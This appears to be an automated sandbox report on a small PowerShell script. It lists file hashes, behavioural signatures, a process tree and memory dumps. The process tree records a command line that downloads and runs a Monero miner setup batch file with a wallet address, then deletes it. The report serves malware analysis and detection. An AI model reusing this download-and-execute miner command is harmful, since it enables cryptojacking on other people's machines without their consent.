Overview

overview

1

Static

static

1

geQkY07V.ps1

windows7-x64

1

geQkY07V.ps1

windows10-2004-x64

1

Analysis

  • max time kernel
    31s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    30/06/2023, 12:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    geQkY07V.ps1

  • Size

    393B

  • MD5

    b36331be1b1deb5bb4701a7cdd75e68a

  • SHA1

    72cc0986a6abb77f1e3cadece22e3170731b0704

  • SHA256

    0cf956f28571a4236d37ba1811d9d484e7848dc52ff5e9dc44c27b330621ef78

  • SHA512

    8636cea76328d04911b029e0b3c15d8cea77d8724a1bca94c4885119ca98060b6b9e3ad4064d6d797146e28c38e4d0c063aec08b90f62302e4ff5332f77abc84

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\geQkY07V.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " = New-Object System.Net.WebClient; = [System.IO.Path]::GetTempFileName(); += '.bat'; .DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', ); & 48DLDM8j9npYi4jN9NaAWPbTDkA2uT7TUGCciLMwX3hdTmqauo9mismgfteSQiZMbjjgEDf6kDEKASnHwWZqMV6e1WaS8ZN; Remove-Item -Force "
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:652

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    620973f41fe888925be4635077f5e0af

    SHA1

    eab7b16af4798a2f92a69ce672fd75b8a8bfa34e

    SHA256

    2119ae33f32de403e01c69c4ba89babe986a33d62e58fd59547c857612b4b16a

    SHA512

    8d82b111d3ff7ae0bdb7936a585bdb4c59c05ba4bb1428456de437ef55db4997b49fde97bd9b790396e1c0236e3bacc678c80c1a18a415002a2de6b2eb6528f2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5A7NBGM19RGJ076NDY78.temp
    Filesize

    7KB

    MD5

    620973f41fe888925be4635077f5e0af

    SHA1

    eab7b16af4798a2f92a69ce672fd75b8a8bfa34e

    SHA256

    2119ae33f32de403e01c69c4ba89babe986a33d62e58fd59547c857612b4b16a

    SHA512

    8d82b111d3ff7ae0bdb7936a585bdb4c59c05ba4bb1428456de437ef55db4997b49fde97bd9b790396e1c0236e3bacc678c80c1a18a415002a2de6b2eb6528f2

    Download Submit

  • memory/652-67-0x0000000002964000-0x0000000002967000-memory.dmp

    Filesize

    12KB

    Download

  • memory/652-68-0x000000000296B000-0x00000000029A2000-memory.dmp

    Filesize

    220KB

    Download

  • memory/1712-58-0x000000001B200000-0x000000001B4E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1712-59-0x00000000022F0000-0x00000000022F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1712-60-0x00000000027E0000-0x0000000002860000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1712-61-0x00000000027E0000-0x0000000002860000-memory.dmp

    Filesize

    512KB

    Download